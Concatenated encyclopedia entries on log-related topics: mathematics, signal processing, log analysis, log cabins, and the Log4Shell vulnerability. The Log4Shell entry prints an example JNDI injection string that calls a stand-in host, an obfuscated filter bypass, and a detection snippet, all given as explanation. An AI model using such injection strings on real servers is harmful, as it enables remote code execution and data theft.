In mathematics , log-polar coordinates (or logarithmic polar coordinates ) is a coordinate system in two dimensions, where a point is identified by two numbers, one for the logarithm of the distance to a certain point, and one for an angle . Log-polar coordinates are closely connected to polar coordinates , which are usually used to describe domains in the plane with some sort of rotational symmetry . In areas like harmonic and complex analysis , the log-polar coordinates are more canonical than polar coordinates.
Log-polar coordinates in the plane consist of a pair of real numbers (ρ,θ), where ρ is the logarithm of the distance between a given point and the origin and θ is the angle between a line of reference (the x -axis) and the line through the origin and the point. The angular coordinate is the same as for polar coordinates, while the radial coordinate is transformed according to the rule

ρ = log r , {\displaystyle \rho =\log r,}
where r {\displaystyle r} is the distance to the origin. The formulas for transformation from Cartesian coordinates to log-polar coordinates are given by

ρ = log x 2 + y 2 , θ = atan2 ( y , x ) , {\displaystyle \rho =\log {\sqrt {x^{2}+y^{2}}},\qquad \theta =\operatorname {atan2} (y,x),}
and the formulas for transformation from log-polar to Cartesian coordinates are

x = e ρ cos θ , y = e ρ sin θ . {\displaystyle x=e^{\rho }\cos \theta ,\qquad y=e^{\rho }\sin \theta .}
By using complex numbers ( x , y ) = x + iy , the latter transformation can be written as

x + i y = e ρ + i θ , {\displaystyle x+iy=e^{\rho +i\theta },}
i.e. the complex exponential function. From this it follows that basic equations in harmonic and complex analysis will have the same simple form as in Cartesian coordinates. This is not the case for polar coordinates.
Laplace's equation in two dimensions is given by

Δ u = ∂ 2 u ∂ x 2 + ∂ 2 u ∂ y 2 = 0 {\displaystyle \Delta u={\frac {\partial ^{2}u}{\partial x^{2}}}+{\frac {\partial ^{2}u}{\partial y^{2}}}=0}

in Cartesian coordinates. Writing the same equation in polar coordinates gives the more complicated equation

1 r ∂ ∂ r ( r ∂ u ∂ r ) + 1 r 2 ∂ 2 u ∂ θ 2 = 0 , {\displaystyle {\frac {1}{r}}{\frac {\partial }{\partial r}}\left(r{\frac {\partial u}{\partial r}}\right)+{\frac {1}{r^{2}}}{\frac {\partial ^{2}u}{\partial \theta ^{2}}}=0,}

or equivalently

( r ∂ ∂ r ) 2 u + ∂ 2 u ∂ θ 2 = 0. {\displaystyle \left(r{\frac {\partial }{\partial r}}\right)^{2}u+{\frac {\partial ^{2}u}{\partial \theta ^{2}}}=0.}
However, from the relation r = e ρ {\displaystyle r=e^{\rho }} it follows that r ∂ ∂ r = ∂ ∂ ρ {\displaystyle r{\frac {\partial }{\partial r}}={\frac {\partial }{\partial \rho }}} , so Laplace's equation in log-polar coordinates,

∂ 2 u ∂ ρ 2 + ∂ 2 u ∂ θ 2 = 0 , {\displaystyle {\frac {\partial ^{2}u}{\partial \rho ^{2}}}+{\frac {\partial ^{2}u}{\partial \theta ^{2}}}=0,}

has the same simple expression as in Cartesian coordinates. This is true for all coordinate systems where the transformation to Cartesian coordinates is given by a conformal mapping . Thus, when considering Laplace's equation for a part of the plane with rotational symmetry, e.g. a circular disk, log-polar coordinates is the natural choice.
A similar situation arises when considering analytical functions . An analytical function f ( x , y ) = u ( x , y ) + i v ( x , y ) {\displaystyle f(x,y)=u(x,y)+iv(x,y)} written in Cartesian coordinates satisfies the Cauchy–Riemann equations:

∂ u ∂ x = ∂ v ∂ y , ∂ u ∂ y = − ∂ v ∂ x . {\displaystyle {\frac {\partial u}{\partial x}}={\frac {\partial v}{\partial y}},\qquad {\frac {\partial u}{\partial y}}=-{\frac {\partial v}{\partial x}}.}
If the function instead is expressed in polar form f ( r e i θ ) = R e i Φ {\displaystyle f(re^{i\theta })=Re^{i\Phi }} , the Cauchy–Riemann equations take the more complicated form

∂ log R ∂ r = 1 r ∂ Φ ∂ θ , 1 r ∂ log R ∂ θ = − ∂ Φ ∂ r . {\displaystyle {\frac {\partial \log R}{\partial r}}={\frac {1}{r}}{\frac {\partial \Phi }{\partial \theta }},\qquad {\frac {1}{r}}{\frac {\partial \log R}{\partial \theta }}=-{\frac {\partial \Phi }{\partial r}}.}
Just as in the case with Laplace's equation, the simple form of Cartesian coordinates is recovered by changing polar into log-polar coordinates (let P = log R {\displaystyle P=\log R} ):

∂ P ∂ ρ = ∂ Φ ∂ θ , ∂ P ∂ θ = − ∂ Φ ∂ ρ . {\displaystyle {\frac {\partial P}{\partial \rho }}={\frac {\partial \Phi }{\partial \theta }},\qquad {\frac {\partial P}{\partial \theta }}=-{\frac {\partial \Phi }{\partial \rho }}.}
The Cauchy–Riemann equations can also be written in one single equation as

∂ f ∂ x + i ∂ f ∂ y = 0. {\displaystyle {\frac {\partial f}{\partial x}}+i{\frac {\partial f}{\partial y}}=0.}
By expressing ∂ ∂ x {\displaystyle {\frac {\partial }{\partial x}}} and ∂ ∂ y {\displaystyle {\frac {\partial }{\partial y}}} in terms of ∂ ∂ ρ {\displaystyle {\frac {\partial }{\partial \rho }}} and ∂ ∂ θ {\displaystyle {\frac {\partial }{\partial \theta }}} , this equation can be written in the equivalent form

∂ f ∂ ρ + i ∂ f ∂ θ = 0. {\displaystyle {\frac {\partial f}{\partial \rho }}+i{\frac {\partial f}{\partial \theta }}=0.}
When one wants to solve the Dirichlet problem in a domain with rotational symmetry, the usual thing to do is to use the method of separation of variables for partial differential equations for Laplace's equation in polar form. This means that one writes u ( r , θ ) = R ( r ) Θ ( θ ) {\displaystyle u(r,\theta )=R(r)\Theta (\theta )} . Laplace's equation is then separated into two ordinary differential equations

Θ ″ ( θ ) + ν 2 Θ ( θ ) = 0 , r 2 R ″ ( r ) + r R ′ ( r ) − ν 2 R ( r ) = 0 , {\displaystyle \Theta ''(\theta )+\nu ^{2}\Theta (\theta )=0,\qquad r^{2}R''(r)+rR'(r)-\nu ^{2}R(r)=0,}
where ν {\displaystyle \nu } is a constant. The first of these has constant coefficients and is easily solved. The second is a special case of Euler's equation

r 2 R ″ ( r ) + c r R ′ ( r ) + d R ( r ) = 0 , {\displaystyle r^{2}R''(r)+crR'(r)+dR(r)=0,}
where c , d {\displaystyle c,d} are constants. This equation is usually solved by the ansatz R ( r ) = r λ {\displaystyle R(r)=r^{\lambda }} , but through use of the log-polar radius, it can be changed into an equation with constant coefficients:

R ¨ ( ρ ) + ( c − 1 ) R ˙ ( ρ ) + d R ( ρ ) = 0. {\displaystyle {\ddot {R}}(\rho )+(c-1){\dot {R}}(\rho )+dR(\rho )=0.}
When considering Laplace's equation, c = 1 {\displaystyle c=1} and d = − ν 2 {\displaystyle d=-\nu ^{2}} , so the equation for R {\displaystyle R} takes the simple form

R ¨ ( ρ ) − ν 2 R ( ρ ) = 0. {\displaystyle {\ddot {R}}(\rho )-\nu ^{2}R(\rho )=0.}
When solving the Dirichlet problem in Cartesian coordinates, these are exactly the equations for x {\displaystyle x} and y {\displaystyle y} . Thus, once again the natural choice for a domain with rotational symmetry is not polar, but rather log-polar, coordinates.
In order to solve a PDE numerically in a domain, a discrete coordinate system must be introduced in this domain. If the domain has rotational symmetry and a grid consisting of rectangles is desired, polar coordinates are a poor choice, since in the center of the circle they give rise to triangles rather than rectangles. However, this can be remedied by introducing log-polar coordinates in the following way. Divide the plane into a grid of squares with side length 2 π / n {\displaystyle 2\pi /n} , where n is a positive integer. Use the complex exponential function to create a log-polar grid in the plane. The left half-plane is then mapped onto the unit disc, with the number of radii equal to n . It can be even more advantageous to instead map the diagonals in these squares, which gives a discrete coordinate system in the unit disc consisting of spirals.
The latter coordinate system is for instance suitable for dealing with Dirichlet and Neumann problems. If the discrete coordinate system is interpreted as an undirected graph in the unit disc, it can be considered as a model for an electrical network. To every line segment in the graph is associated a conductance given by a function γ {\displaystyle \gamma } . The electrical network will then serve as a discrete model for the Dirichlet problem in the unit disc, where the Laplace equation takes the form of Kirchhoff's law. On the nodes on the boundary of the circle, an electrical potential (Dirichlet data) is defined, which induces an electric current (Neumann data) through the boundary nodes. The linear operator Λ γ {\displaystyle \Lambda _{\gamma }} from Dirichlet data to Neumann data is called a Dirichlet-to-Neumann operator , and depends on the topology and conductance of the network.
In the case with the continuous disc, it follows that if the conductance is homogeneous, let's say γ = 1 {\displaystyle \gamma =1} everywhere, then the Dirichlet-to-Neumann operator satisfies the following equation:

Λ γ 2 = − ∂ 2 ∂ θ 2 . {\displaystyle \Lambda _{\gamma }^{2}=-{\frac {\partial ^{2}}{\partial \theta ^{2}}}.}
Already at the end of the 1970s, applications for the discrete spiral coordinate system were given in image analysis ( image registration ). Representing an image in this coordinate system rather than in Cartesian coordinates gives computational advantages when rotating or zooming an image. Also, the photo receptors in the retina of the human eye are distributed in a way that has strong similarities to the spiral coordinate system. [ 1 ] Similar spirals can also be found in the Mandelbrot fractal .
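A minimal sketch of such a log-polar resampling of a grayscale image, using nearest-neighbour lookup on a grid whose sizes are arbitrary choices:

```python
import numpy as np

def to_log_polar(image, n_rho=64, n_theta=64):
    """Resample a 2-D array onto a log-polar grid centred on the image centre."""
    h, w = image.shape
    cy, cx = (h - 1) / 2, (w - 1) / 2
    r_max = min(cy, cx)                                   # assumes r_max > 1
    rho = np.linspace(0.0, np.log(r_max), n_rho)          # log radius
    theta = np.linspace(0, 2 * np.pi, n_theta, endpoint=False)
    r = np.exp(rho)[:, None]                              # broadcast over angles
    ys = np.clip(np.round(cy + r * np.sin(theta)).astype(int), 0, h - 1)
    xs = np.clip(np.round(cx + r * np.cos(theta)).astype(int), 0, w - 1)
    return image[ys, xs]
```

In this representation a rotation of the input becomes a circular shift along the θ axis, and a uniform scaling becomes a shift along the ρ axis, which is what makes registration by simple correlation possible.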
Log-polar coordinates can also be used to construct fast methods for the Radon transform and its inverse. [ 2 ] | https://en.wikipedia.org/wiki/Log-polar_coordinates |
In theoretical computer science , the log-rank conjecture states that the deterministic communication complexity of a two-party Boolean function is polynomially related to the logarithm of the rank of its input matrix. [ 1 ] [ 2 ]
Let D ( f ) {\displaystyle D(f)} denote the deterministic communication complexity of a function, and let rank ( f ) {\displaystyle \operatorname {rank} (f)} denote the rank of its input matrix M f {\displaystyle M_{f}} (over the reals). Since every protocol using up to c {\displaystyle c} bits partitions M f {\displaystyle M_{f}} into at most 2 c {\displaystyle 2^{c}} monochromatic rectangles, and each of these has rank at most 1,

log 2 rank ( f ) ≤ D ( f ) . {\displaystyle \log _{2}\operatorname {rank} (f)\leq D(f).}
The log-rank conjecture states that D ( f ) {\displaystyle D(f)} is also upper-bounded by a polynomial in the log-rank: for some constant C {\displaystyle C} ,

D ( f ) = O ( ( log rank ( f ) ) C ) . {\displaystyle D(f)=O\left((\log \operatorname {rank} (f))^{C}\right).}
Lovett [ 3 ] proved the upper bound

D ( f ) = O ( rank ( f ) log rank ( f ) ) . {\displaystyle D(f)=O\left({\sqrt {\operatorname {rank} (f)}}\,\log \operatorname {rank} (f)\right).}
This was improved by Sudakov and Tomon, [ 4 ] who removed the logarithmic factor, showing that

D ( f ) = O ( rank ( f ) ) . {\displaystyle D(f)=O\left({\sqrt {\operatorname {rank} (f)}}\right).}
This is the best currently known upper bound.
The best known lower bound, due to Göös, Pitassi and Watson, [ 5 ] states that C ≥ 2 {\displaystyle C\geq 2} . In other words, there exists a sequence of functions f n {\displaystyle f_{n}} , whose log-rank goes to infinity, such that

D ( f n ) = Ω ~ ( ( log rank ( f n ) ) 2 ) . {\displaystyle D(f_{n})={\tilde {\Omega }}\left((\log \operatorname {rank} (f_{n}))^{2}\right).}
In 2019, an approximate version of the conjecture for randomised communication was disproved. [ 6 ]
The log-spectral distance (LSD) , also referred to as log-spectral distortion or root mean square log-spectral distance , is a distance measure between two spectra . [ 1 ] The log-spectral distance between spectra P ( ω ) {\displaystyle P\left(\omega \right)} and P ^ ( ω ) {\displaystyle {\hat {P}}\left(\omega \right)} is defined as the p-norm :

D L S = { 1 2 π ∫ − π π [ log P ( ω ) − log P ^ ( ω ) ] p d ω } 1 / p , {\displaystyle D_{LS}={\left\{{\frac {1}{2\pi }}\int _{-\pi }^{\pi }\left[\log P(\omega )-\log {\hat {P}}(\omega )\right]^{p}\,d\omega \right\}}^{1/p},}
Unlike the Itakura–Saito distance , the log-spectral distance is symmetric. [ 2 ]
In speech coding , log spectral distortion for a given frame is defined as the root mean square difference between the original LPC log power spectrum and the quantized or interpolated LPC log power spectrum. Usually the average of spectral distortion over a large number of frames is calculated and that is used as the measure of performance of quantization or interpolation .
When measuring the distortion between signals, the scale or temporality/spatiality of the signals can have different levels of significance to the distortion measures. To incorporate the proper level of significance, the signals can be transformed into a different domain.
When the signals are transformed into the spectral domain with transformation methods such as Fourier transform and DCT , the spectral distance is the measure to compare the transformed signals. LSD incorporates the logarithmic characteristics of the power spectra, and it becomes effective when the processing task of the power spectrum also has logarithmic characteristics, e.g. human listening to the sound signal with different levels of loudness.
Moreover, the LSD is equal to the cepstral distance, the distance between the signals' cepstra , when the p-numbers are the same, by Parseval's theorem .
As LSD is in the form of p-norm, it can be represented with different p-numbers and log scales.
For instance, when it is expressed in dB with L2 norm, it is defined as: D L S = 1 2 π ∫ − π π [ 10 log 10 P ( ω ) P ^ ( ω ) ] 2 d ω {\displaystyle D_{LS}={\sqrt {{\frac {1}{2\pi }}\int _{-\pi }^{\pi }\left[10\log _{10}{\frac {P(\omega )}{{\hat {P}}(\omega )}}\right]^{2}\,d\omega }}} .
When it is represented in the discrete space , it is defined as: D L S = { 1 N ∑ n = 1 N [ log P ( n ) − log P ^ ( n ) ] p } 1 / p , {\displaystyle D_{LS}={\left\{{\frac {1}{N}}\sum _{n=1}^{N}\left[\log P(n)-\log {\hat {P}}(n)\right]^{p}\right\}}^{1/p},} where P ( n ) {\displaystyle P\left(n\right)} and P ^ ( n ) {\displaystyle {\hat {P}}\left(n\right)} are power spectra in discrete space.
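A sketch of the discrete form just given, together with the dB-scaled L2 variant from above; inputs are arrays of positive power-spectrum values, and the names are illustrative.

```python
import numpy as np

def lsd(p, p_hat, p_norm=2):
    """Discrete log-spectral distance between two power spectra."""
    d = np.log(np.asarray(p)) - np.log(np.asarray(p_hat))
    return np.mean(np.abs(d) ** p_norm) ** (1.0 / p_norm)

def lsd_db(p, p_hat):
    """Root mean square log-spectral distance in decibels (L2 norm)."""
    d = 10.0 * np.log10(np.asarray(p) / np.asarray(p_hat))
    return np.sqrt(np.mean(d ** 2))
```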
Log4Shell ( CVE-2021-44228 ) is a zero-day vulnerability reported in November 2021 in Log4j , a popular Java logging framework , involving arbitrary code execution . [ 2 ] [ 3 ] The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation , of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud 's security team on 24 November 2021. [ 4 ]
Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. [ 2 ] [ 1 ] [ 5 ] [ 6 ] [ 7 ] Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. [ 8 ] The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices. [ 7 ] [ 9 ]
The vulnerability takes advantage of Log4j's allowing requests to arbitrary LDAP and JNDI servers, [ 2 ] [ 10 ] [ 11 ] allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. [ 6 ] A list of its affected software projects has been published by the Apache Security Team . [ 12 ] Affected commercial services include Amazon Web Services , [ 13 ] Cloudflare , iCloud , [ 14 ] Minecraft: Java Edition , [ 15 ] Steam , Tencent QQ and many others. [ 10 ] [ 16 ] [ 17 ] According to Wiz and EY , the vulnerability affected 93% of enterprise cloud environments. [ 18 ]
The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," [ 19 ] Ars Technica called it "arguably the most severe vulnerability ever" [ 20 ] and The Washington Post said that descriptions by security professionals "border on the apocalyptic." [ 9 ]
Log4j is an open-source logging framework that allows software developers to log data within their applications, and can include user input. [ 21 ] It is used ubiquitously in Java applications, especially enterprise software. [ 6 ] Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation . [ 22 ] Tom Kellermann, a member of President Obama 's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments". [ 23 ]
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol [ 24 ] which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet. [ 25 ]
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name} . [ 25 ] For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67 . [ 26 ] Among the recognized expressions is ${jndi:<lookup>} ; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file} , for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. [ 25 ] Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables —by placing them in the URL, in which case they will be substituted and sent to the attacker's server. [ 27 ] [ 28 ] Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP). [ 29 ] [ 30 ]
Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header , such as User-Agent . Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi . [ 31 ] Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi , for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j . [ 32 ] Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed. [ 25 ]
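To illustrate why the naive string matching described above is easy to circumvent, the following Python sketch repeatedly unwraps one simple class of nested lookups before testing for the ${jndi marker. The patterns and function name are illustrative only; this is nowhere near an exhaustive or production-grade filter.

```python
import re

# Unwrap simple nested lookups such as ${lower:j} / ${upper:J} before matching.
NESTED = re.compile(r"\$\{(?:lower|upper):(.)\}", re.IGNORECASE)

def looks_like_jndi_probe(s: str) -> bool:
    prev = None
    while prev != s:                       # keep unwrapping until stable
        prev = s
        s = NESTED.sub(r"\1", s)
    return "${jndi" in s.lower()

print(looks_like_jndi_probe("${${lower:j}ndi:ldap://example.com/a}"))  # True
print(looks_like_jndi_probe("plain harmless log line"))                # False
```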
Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. [ 33 ] [ 34 ] [ 35 ] The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. [ 36 ] [ 37 ] Two more vulnerabilities in the library were found: a denial-of-service attack , tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. [ 38 ] [ 39 ] For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. [ 8 ] [ 36 ] An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true , but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases. [ 8 ] [ 36 ]
Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. [ 2 ] [ 27 ] [ 40 ] [ 41 ] Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages. [ 42 ]
Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. [ 43 ] The approach is recommended by NCC Group [ 44 ] and the National Cyber Security Centre (United Kingdom) , [ 45 ] and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced [ 46 ] by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE .
The exploit allows hackers to gain control of vulnerable devices using Java. [ 7 ] Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining , creating botnets , sending spam, establishing backdoors and other illegal activities such as ransomware attacks. [ 7 ] [ 9 ] [ 47 ] In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally. [ 7 ] [ 23 ]
According to Cloudflare CEO Matthew Prince , evidence of exploitation or of scanning for the exploit goes back as early as 1 December, nine days before it was publicly disclosed. [ 48 ] According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. [ 49 ] Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. [ 7 ] [ 48 ] [ 50 ] Ransomware group Conti was observed using the vulnerability on 17 December. [ 9 ]
Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. [ 9 ] [ 19 ] Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions. [ 9 ]
In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly , described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates. [ 7 ] [ 51 ] [ 47 ] Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. [ 9 ] On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software. [ 52 ] In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have many eyes on them , others do not have many or any people ensuring their security. [ 53 ] [ 54 ]
Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. [ 55 ] [ 56 ] The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications. [ 57 ] [ 58 ]
The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. [ 59 ] The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." [ 60 ] The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network. [ 61 ]
The Chinese Ministry of Industry and Information Technology suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first. [ 62 ]
Research conducted by Wiz and EY [ 18 ] showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell. [ 9 ] Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021. [ 63 ]
The human resource management and workforce management company UKG , one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. [ 20 ] [ 64 ] UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection. [ 64 ]
As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets. [ 47 ]
Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support. [ 9 ]
As of 14 December 2021, almost half of all corporate networks globally had been actively probed, with over 60 variants of the exploit having been produced within 24 hours. [ 65 ] Check Point Software Technologies in a detailed analysis described the situation as being "a true cyber-pandemic" and characterized the potential for damage as "incalculable". [ 66 ] Several initial advisories exaggerated the number of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread [ 67 ] and by external security researchers. [ 68 ]
Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability ... lives up to the hype for a host of reasons". [ 19 ] The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". [ 19 ] Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data. [ 19 ]
Amit Yoran , CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team , stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". [ 19 ] Sophos 's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet." [ 19 ]
According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference. [ 69 ] | https://en.wikipedia.org/wiki/Log4Shell |
In computer log management and intelligence , log analysis (or system and network log analysis ) is an art and science seeking to make sense of computer-generated records (also called log or audit trail records). The process of creating such records is called data logging .
Typical reasons why people perform log analysis are:
Logs are emitted by network devices, operating systems, applications and all manner of intelligent or programmable devices. A stream of messages in time sequence often comprises a log. Logs may be directed to files and stored on disk or directed as a network stream to a log collector.
Log messages must usually be interpreted with respect to the internal state of their source (e.g., an application), and they announce security-relevant or operations-relevant events (e.g., a user login, or a system error).
Logs are often created by software developers to aid in the debugging of the operation of an application or understanding how users are interacting with a system, such as a search engine. The syntax and semantics of data within log messages are usually application or vendor-specific. The terminology may also vary; for example, the authentication of a user to an application may be described as a log in, a logon, a user connection or an authentication event. Hence, log analysis must interpret messages within the context of an application, vendor, system or configuration to make useful comparisons to messages from different log sources.
Log message format or content may not always be fully documented. A task of the log analyst is to induce the system to emit the full range of messages to understand the complete domain from which the messages must be interpreted.
A log analyst may map varying terminology from different log sources into a uniform, normalized terminology so that reports and statistics can be derived from a heterogeneous environment. For example, log messages from Windows, Unix, network firewalls, and databases may be aggregated into a "normalized" report for the auditor. Different systems may signal different message priorities with a different vocabulary, such as "error" and "warning" vs. "err", "warn", and "critical".
Hence, log analysis practices exist on the continuum from text retrieval to reverse engineering of software.
Pattern recognition is the function of selecting incoming messages and comparing them with a pattern book in order to filter them or handle them in different ways.
Normalization is the function of converting message parts to the same format (e.g. common date format or normalized IP address).
Classification and tagging is ordering messages into different classes or tagging them with different keywords for later usage (e.g. filtering or display).
Correlation analysis is a technology of collecting messages from different systems and finding all the messages belonging to one single event (e.g., messages generated by malicious activity on different systems: network devices, firewalls, servers, etc.). It is usually connected with alerting systems.
Artificial ignorance is a machine-learning process that discards log entries known to be uninteresting. Artificial ignorance is a method to detect anomalies in a working system. In log analysis, this means recognizing and ignoring the regular, common log messages that result from the normal operation of the system, and that are therefore not too interesting. However, new messages that have not appeared in the logs before can signal important events, and should therefore be investigated. [ 1 ] [ 2 ] In addition to anomalies, the algorithm will identify common events that did not occur, for example a system update that runs every week but has failed to run.
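A toy sketch of this idea: routine messages are matched by an explicit list of patterns, and everything else is surfaced for investigation. The patterns and log messages are invented examples.

```python
import re

# Patterns for log lines known to be routine; anything unmatched is surfaced.
BORING = [
    re.compile(r"session (opened|closed) for user \w+"),
    re.compile(r"health check OK"),
]

def interesting(lines):
    """Discard log entries known to be uninteresting; keep the rest."""
    return [line for line in lines if not any(p.search(line) for p in BORING)]

logs = [
    "sshd: session opened for user alice",
    "kernel: disk I/O error on sda1",
    "monitor: health check OK",
]
print(interesting(logs))   # only the disk error remains
```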
Log analysis is often compared to other analytics tools such as application performance management (APM) and error monitoring. While much of their functionality clearly overlaps, the difference is rooted in process. APM has an emphasis on performance and is utilized most in production. Error monitoring is driven by developers rather than operations, and integrates into code in exception handling blocks.
Log area ratios ( LAR ) can be used to represent reflection coefficients (another form for linear prediction coefficients ) for transmission over a channel. While not as efficient as line spectral pairs (LSPs), log area ratios are much simpler to compute. Let r k {\displaystyle r_{k}} be the k th reflection coefficient of a filter; the k th LAR is:

A k = log 1 + r k 1 − r k . {\displaystyle A_{k}=\log {\frac {1+r_{k}}{1-r_{k}}}.}
Use of log area ratios has now been mostly replaced by line spectral pairs, but older codecs, such as GSM-FR , use LARs.
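A sketch of the mapping and its inverse; the inverse follows from solving the definition for r_k, giving r_k = tanh(A_k/2). Function names are illustrative.

```python
import numpy as np

def reflection_to_lar(r):
    """Log area ratios for reflection coefficients r (|r| < 1)."""
    r = np.asarray(r, dtype=float)
    return np.log((1 + r) / (1 - r))

def lar_to_reflection(a):
    """Inverse mapping: r = (e^A - 1) / (e^A + 1) = tanh(A / 2)."""
    return np.tanh(np.asarray(a, dtype=float) / 2)

r = np.array([0.9, -0.3, 0.0])
print(lar_to_reflection(reflection_to_lar(r)))   # round trip recovers r
```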
A log cabin is a small log house , especially a minimally finished or less architecturally sophisticated structure. Log cabins have an ancient history in Europe, and in America are often associated with first-generation home building by settlers.
Construction with logs was described by Roman architect Vitruvius Pollio in his architectural treatise De Architectura . He noted that in Pontus in present-day northeastern Turkey , dwellings were constructed by laying logs horizontally overtop of each other and filling in the gaps with "chips and mud". [ 1 ]
Log cabin construction has its roots in Scandinavia and Eastern Europe . Although their precise origin is uncertain, the first log structures were probably being built in Northern Europe by the Bronze Age around 3500 BC. C. A. Weslager describes Europeans as having:
